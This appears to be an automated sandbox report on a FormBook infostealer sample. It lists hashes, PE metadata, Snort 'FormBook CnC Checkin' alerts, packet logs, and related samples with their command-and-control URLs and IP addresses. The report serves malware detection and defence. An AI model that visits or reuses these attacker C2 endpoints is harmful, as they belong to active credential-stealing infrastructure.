                                                                  Original Invoice-COAU7230734290.xlsxGet hashmaliciousBrowse
                                                                  • www.mels.ink/jzvu/?Cfw=iJYv1UkrTzZtiuEKuxHty87S2Dat4Pv7WpvfTrmOLEk2tcdYje0Px5XPsXKXm5aj0GbIDQ==&QDHH=nN980P
                                                                  RMwfvA9kZy.exeGet hashmaliciousBrowse
                                                                  • www.regalparkllc.com/nnmd/?c2Mh-=tTl8v8g035m6yKE51UQNVvYPTgelaUE7gWj9K32eZH50WSszu74cxmO0I8K07RzhCUDK&tVm4=J690I
                                                                  ZwNJI24QAf.exeGet hashmaliciousBrowse
                                                                  • www.micheldrake.com/p2io/?8p=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+a1Y8u0zs/SS1CQHpw==&ChOh3=H0Gdhfb
                                                                  loMStbzHSP.exeGet hashmaliciousBrowse
                                                                  • www.micheldrake.com/p2io/?sZvD8l=Spap-DKpf&7nEpiRy=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+a1hjfUwipOV1CQA6A==
                                                                  CVE9362.exeGet hashmaliciousBrowse
                                                                  • www.colorblindwork.com/ksb/?ofuxZr=dWIaQL0PIzW1akyTL8Rl6DSxnESZDNu4upVzjJTzlVvTtXgXRqzkSDdoiRY4N8qhYGfg&1bg=onMPeNox4PLhS
                                                                  SWIFT COPY_PDF.exeGet hashmaliciousBrowse
                                                                  • www.michaelroberts.gallery/m2be/?Et5pFP9=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaClCICcsINp3OOFeDA==&uDKLJ=D48t
                                                                  MV Sky Marine_pdf.exeGet hashmaliciousBrowse
                                                                  • www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW
                                                                  NEW ORDER_PDF.exeGet hashmaliciousBrowse
                                                                  • www.mamaoutloud.com/s8ri/?bl=UTChTb0hUjYl5Vd&Y2JpVVJ=u9elXLp277xnqVcwAnLNhuW6l0GYaPGhHfcVWexw3ERwjVjzs8/RHD/51sUEjByU9HeW
                                                                  32ciKQsy2X.exeGet hashmaliciousBrowse
                                                                  • www.earth-emily.com/4qdc/?AR-XJ2=Wph7KmTxuM3Gsk6JJA1oy52G3sDFb69RyaiHg2D5Z4a2zIwRuNgDhRaz3sbfTzDvPg+4&et-=XPJxZ2SpixNTl6pp
                                                                  Fym9exdpg8.exeGet hashmaliciousBrowse
                                                                  • www.espressoandhoney.com/gts/?9rkdzNqh=EzY5lfbdKr94xDCu9UGw63kyV4asBdh+DU/WNzhiAESrVolwAii5R+YbRjGRKuu5f9CU/7tXGg==&FR-8RX=3fCpm
                                                                  PO_210316.exe.exeGet hashmaliciousBrowse
                                                                  • www.ga-don.com/ntg/?tXUp=YP7DfZXHo&p0D=WOLsrCKcrV537zGLK3AUh+BiQyTRpI49VOz5B2TFxvfb2Jntw5H/Y3VWDNX0TqmXK6eo
                                                                  pVXFB33FzO.exeGet hashmaliciousBrowse
                                                                  • www.leadeligey.com/bw82/?VR-T8=l6AlF0u814LH_Lj&BRAh4F=vUh86D2kaUcvG8cSXUIE+TYOTfOFz6ihzRiGvCHG7B+/lKZzNCz3xlSTvMpIR1S+NdhZ
                                                                  EuDXqof7Tf.exeGet hashmaliciousBrowse
                                                                  • www.thehumboldtlife.com/smd0/?FPWlMXl=d6QrSWppnHOFtnwEPnVYTCwaC4pvPTP/peW/DzgbzQLmUmVOVerI/d+4OTFHCaVj4q0+&AlB=O2JtVnHxm

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comg2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  winlog.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                                  • 3.13.255.157
                                                                  Wire Transfer Update.exeGet hashmaliciousBrowse
                                                                  • 3.13.255.157
                                                                  LtfVNumoON.exeGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  giATspz5dw.exeGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  Customer-100912288113.xlsxGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  New order.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  qRsvaKcvxZ.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  PO-RFQ # 097663899 pdf .exeGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  PO45937008ADENGY.exeGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  Calt7BoW2a.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  8sxgohtHjM.exeGet hashmaliciousBrowse
                                                                  • 3.13.255.157
                                                                  vbc.exeGet hashmaliciousBrowse
                                                                  • 3.13.255.157
                                                                  Order Inquiry.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  PaymentAdvice.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  BL01345678053567.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  Shipping Documents.xlsxGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                  • 3.13.255.157
                                                                  www.moretuantired.comMV WAF PASSION.exeGet hashmaliciousBrowse
                                                                  • 81.17.18.198
                                                                  www.betbonusuk.comhvEop8Y70Y.exeGet hashmaliciousBrowse
                                                                  • 172.67.187.138
                                                                  AAXIFJn78w.exeGet hashmaliciousBrowse
                                                                  • 104.21.7.67
                                                                  vfe1GoeC5F.exeGet hashmaliciousBrowse
                                                                  • 172.67.187.138
                                                                  fNiff08dxi.exeGet hashmaliciousBrowse
                                                                  • 104.21.7.67
                                                                  hotlightexpens.funMV WAF PASSION.exeGet hashmaliciousBrowse
                                                                  • 52.86.219.129
                                                                  AAXIFJn78w.exeGet hashmaliciousBrowse
                                                                  • 34.196.151.230
                                                                  Feb SOA.xlsxGet hashmaliciousBrowse
                                                                  • 54.144.3.29
                                                                  IMG001.exeGet hashmaliciousBrowse
                                                                  • 52.206.71.220
                                                                  www.getboostphlo.comhvEop8Y70Y.exeGet hashmaliciousBrowse
                                                                  • 172.67.219.254

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  AUTOMATTICUSg2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.25
                                                                  12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.25
                                                                  winlog.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.231
                                                                  Customer-100912288113.xlsxGet hashmaliciousBrowse
                                                                  • 192.0.78.25
                                                                  Purchase Order.xlsxGet hashmaliciousBrowse
                                                                  • 192.0.78.172
                                                                  HG546092227865431209.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  invoice.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.175
                                                                  vbc.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.25
                                                                  o2KKHvtb3c.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  PO#41000055885.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  BL836477488575.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.194
                                                                  FARASIS.xlsxGet hashmaliciousBrowse
                                                                  • 192.0.79.33
                                                                  FARASIS.xlsxGet hashmaliciousBrowse
                                                                  • 192.0.79.32
                                                                  RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.25
                                                                  swift_76567643.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.25
                                                                  Swift.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  TNUiVpymgH.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  CLOUDFLARENETUS4oItdZkNOZ.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  ieuHgdpuPo.exeGet hashmaliciousBrowse
                                                                  • 104.21.17.57
                                                                  Cobro Juridico_0420198202_326828_4985792583130360_300690_8122300886764676459_5190713730838_pdf.exeGet hashmaliciousBrowse
                                                                  • 172.67.222.176
                                                                  Payment Slip.docGet hashmaliciousBrowse
                                                                  • 104.21.17.57
                                                                  Cobro Juridico_0291662728_7023446_452487041454723_016698_5192136884256735776_2301761820735_pdf.exeGet hashmaliciousBrowse
                                                                  • 104.21.17.57
                                                                  INQUIRY 1820521 pdf.exeGet hashmaliciousBrowse
                                                                  • 104.21.82.58
                                                                  PaymentCopy.vbsGet hashmaliciousBrowse
                                                                  • 172.67.222.131
                                                                  PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                  • 104.21.28.135
                                                                  PO NUMBER 3120386 3120393 SIGNED.exeGet hashmaliciousBrowse
                                                                  • 1.2.3.4
                                                                  Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exeGet hashmaliciousBrowse
                                                                  • 172.67.222.176
                                                                  BL2659618800638119374.xls.exeGet hashmaliciousBrowse
                                                                  • 172.67.222.176
                                                                  Purchase order and quote confirmation.exeGet hashmaliciousBrowse
                                                                  • 172.67.222.176
                                                                  Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exeGet hashmaliciousBrowse
                                                                  • 172.67.188.154
                                                                  Re Confirm#U00ffthe invoice#U00ffthe payment slip.exeGet hashmaliciousBrowse
                                                                  • 104.21.17.57
                                                                  SOA.exeGet hashmaliciousBrowse
                                                                  • 104.21.19.200
                                                                  RFQ No A'4762GHTECHNICAL DETAILS.exeGet hashmaliciousBrowse
                                                                  • 104.21.19.200
                                                                  GQ5JvPEI6c.exeGet hashmaliciousBrowse
                                                                  • 104.21.17.57
                                                                  setupapp.exeGet hashmaliciousBrowse
                                                                  • 172.67.164.1
                                                                  g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                  • 172.67.161.4
                                                                  C++ Dropper.exeGet hashmaliciousBrowse
                                                                  • 104.21.50.92

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\s6G3ZtvHZg.exe.log
                                                                  Process:C:\Users\user\Desktop\s6G3ZtvHZg.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1314
                                                                  Entropy (8bit):5.350128552078965
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                  MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                  SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                  SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.693808670494275
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:s6G3ZtvHZg.exe
                                                                  File size:893952
                                                                  MD5:885e567660a28ec23b692291587ef69f
                                                                  SHA1:9e200dd274b4be5df241719fe72f6403938a8561
                                                                  SHA256:fb23a007cf696e3c6b119c61b62824abc56b47a7e2f82337e890acc9024bd88c
                                                                  SHA512:e7d965fab740e6fa1d15da2d2ffaf41927edbc5b0af13745f0e30f3b1d09ef2009720a22ab6100ba9db2dea85f9bcb8322575a9d9179521ca56daf15034c7cbc
                                                                  SSDEEP:24576:Z0QVbXphtO83Ns/nzuzW59j+12Fih2TjvLe:7zjM8SvzuzW59j+1IimvL
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.s`..............P..............=... ...@....@.. ....................................@................................

                                                                  File Icon

                                                                  Icon Hash:d28ab3b0e0ab96c4

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4b3d16
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x60739D78 [Mon Apr 12 01:08:08 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb3cc40x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x28024.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xb1d1c0xb1e00False0.953868916901data7.94799509268IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xb40000x280240x28200False0.347449376947data5.34674727144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xde0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0xb42800x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                  RT_ICON0xc4aa80x94a8data
                                                                  RT_ICON0xcdf500x5488data
                                                                  RT_ICON0xd33d80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                  RT_ICON0xd76000x25a8data
                                                                  RT_ICON0xd9ba80x10a8data
                                                                  RT_ICON0xdac500x988data
                                                                  RT_ICON0xdb5d80x468GLS_BINARY_LSB_FIRST
                                                                  RT_GROUP_ICON0xdba400x76data
                                                                  RT_VERSION0xdbab80x37edata
                                                                  RT_MANIFEST0xdbe380x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright 2012
                                                                  Assembly Version8.1.1.15
                                                                  InternalNameSyncSortedList.exe
                                                                  FileVersion8.1.1.14
                                                                  CompanyNameLandskip Yard Care
                                                                  LegalTrademarksA++
                                                                  Comments
                                                                  ProductNameLevelActivator
                                                                  ProductVersion8.1.1.14
                                                                  FileDescriptionLevelActivator
                                                                  OriginalFilenameSyncSortedList.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  04/12/21-10:03:55.992832TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.7104.21.7.67
                                                                  04/12/21-10:03:55.992832TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.7104.21.7.67
                                                                  04/12/21-10:03:55.992832TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.7104.21.7.67
                                                                  04/12/21-10:04:06.577115TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.73.13.255.157
                                                                  04/12/21-10:04:06.577115TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.73.13.255.157
                                                                  04/12/21-10:04:06.577115TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.73.13.255.157
                                                                  04/12/21-10:04:45.313567TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.752.58.78.16
                                                                  04/12/21-10:04:45.313567TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.752.58.78.16
                                                                  04/12/21-10:04:45.313567TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.752.58.78.16

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 12, 2021 10:03:23.034774065 CEST4970580192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:03:23.075706959 CEST8049705192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:03:23.075937986 CEST4970580192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:03:23.076253891 CEST4970580192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:03:23.117088079 CEST8049705192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:03:23.117110968 CEST8049705192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:03:23.117119074 CEST8049705192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:03:23.117327929 CEST4970580192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:03:23.117460012 CEST4970580192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:03:23.158083916 CEST8049705192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:03:44.995295048 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.297630072 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.297919989 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.298271894 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.600028038 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601017952 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601061106 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601099968 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601140976 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601155996 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.601180077 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601210117 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.601217985 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601258039 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601300955 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.601301908 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601350069 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.601362944 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:50.707400084 CEST4971880192.168.2.781.17.18.198
                                                                  Apr 12, 2021 10:03:50.757863998 CEST804971881.17.18.198192.168.2.7
                                                                  Apr 12, 2021 10:03:50.757976055 CEST4971880192.168.2.781.17.18.198
                                                                  Apr 12, 2021 10:03:50.758109093 CEST4971880192.168.2.781.17.18.198
                                                                  Apr 12, 2021 10:03:50.808378935 CEST804971881.17.18.198192.168.2.7
                                                                  Apr 12, 2021 10:03:50.822356939 CEST804971881.17.18.198192.168.2.7
                                                                  Apr 12, 2021 10:03:50.822392941 CEST804971881.17.18.198192.168.2.7
                                                                  Apr 12, 2021 10:03:50.822529078 CEST4971880192.168.2.781.17.18.198
                                                                  Apr 12, 2021 10:03:50.822621107 CEST4971880192.168.2.781.17.18.198
                                                                  Apr 12, 2021 10:03:50.873472929 CEST804971881.17.18.198192.168.2.7
                                                                  Apr 12, 2021 10:03:55.941447020 CEST4971980192.168.2.7104.21.7.67
                                                                  Apr 12, 2021 10:03:55.992517948 CEST8049719104.21.7.67192.168.2.7
                                                                  Apr 12, 2021 10:03:55.992671967 CEST4971980192.168.2.7104.21.7.67
                                                                  Apr 12, 2021 10:03:55.992831945 CEST4971980192.168.2.7104.21.7.67
                                                                  Apr 12, 2021 10:03:56.045136929 CEST8049719104.21.7.67192.168.2.7
                                                                  Apr 12, 2021 10:03:56.058897972 CEST8049719104.21.7.67192.168.2.7
                                                                  Apr 12, 2021 10:03:56.058953047 CEST8049719104.21.7.67192.168.2.7
                                                                  Apr 12, 2021 10:03:56.059065104 CEST4971980192.168.2.7104.21.7.67
                                                                  Apr 12, 2021 10:03:56.059170008 CEST4971980192.168.2.7104.21.7.67
                                                                  Apr 12, 2021 10:03:56.110069990 CEST8049719104.21.7.67192.168.2.7
                                                                  Apr 12, 2021 10:04:01.148515940 CEST4972080192.168.2.752.56.126.26
                                                                  Apr 12, 2021 10:04:01.200898886 CEST804972052.56.126.26192.168.2.7
                                                                  Apr 12, 2021 10:04:01.201147079 CEST4972080192.168.2.752.56.126.26
                                                                  Apr 12, 2021 10:04:01.201181889 CEST4972080192.168.2.752.56.126.26
                                                                  Apr 12, 2021 10:04:01.253643990 CEST804972052.56.126.26192.168.2.7
                                                                  Apr 12, 2021 10:04:01.253669024 CEST804972052.56.126.26192.168.2.7
                                                                  Apr 12, 2021 10:04:01.253680944 CEST804972052.56.126.26192.168.2.7
                                                                  Apr 12, 2021 10:04:01.253880978 CEST4972080192.168.2.752.56.126.26
                                                                  Apr 12, 2021 10:04:01.253906012 CEST4972080192.168.2.752.56.126.26
                                                                  Apr 12, 2021 10:04:01.306417942 CEST804972052.56.126.26192.168.2.7
                                                                  Apr 12, 2021 10:04:06.439419031 CEST4972180192.168.2.73.13.255.157
                                                                  Apr 12, 2021 10:04:06.576766968 CEST80497213.13.255.157192.168.2.7
                                                                  Apr 12, 2021 10:04:06.576963902 CEST4972180192.168.2.73.13.255.157
                                                                  Apr 12, 2021 10:04:06.577115059 CEST4972180192.168.2.73.13.255.157
                                                                  Apr 12, 2021 10:04:06.714370012 CEST80497213.13.255.157192.168.2.7
                                                                  Apr 12, 2021 10:04:06.714777946 CEST80497213.13.255.157192.168.2.7
                                                                  Apr 12, 2021 10:04:06.714795113 CEST80497213.13.255.157192.168.2.7
                                                                  Apr 12, 2021 10:04:06.714907885 CEST4972180192.168.2.73.13.255.157
                                                                  Apr 12, 2021 10:04:06.715009928 CEST4972180192.168.2.73.13.255.157
                                                                  Apr 12, 2021 10:04:06.852257967 CEST80497213.13.255.157192.168.2.7
                                                                  Apr 12, 2021 10:04:17.127279997 CEST4973480192.168.2.752.206.71.220
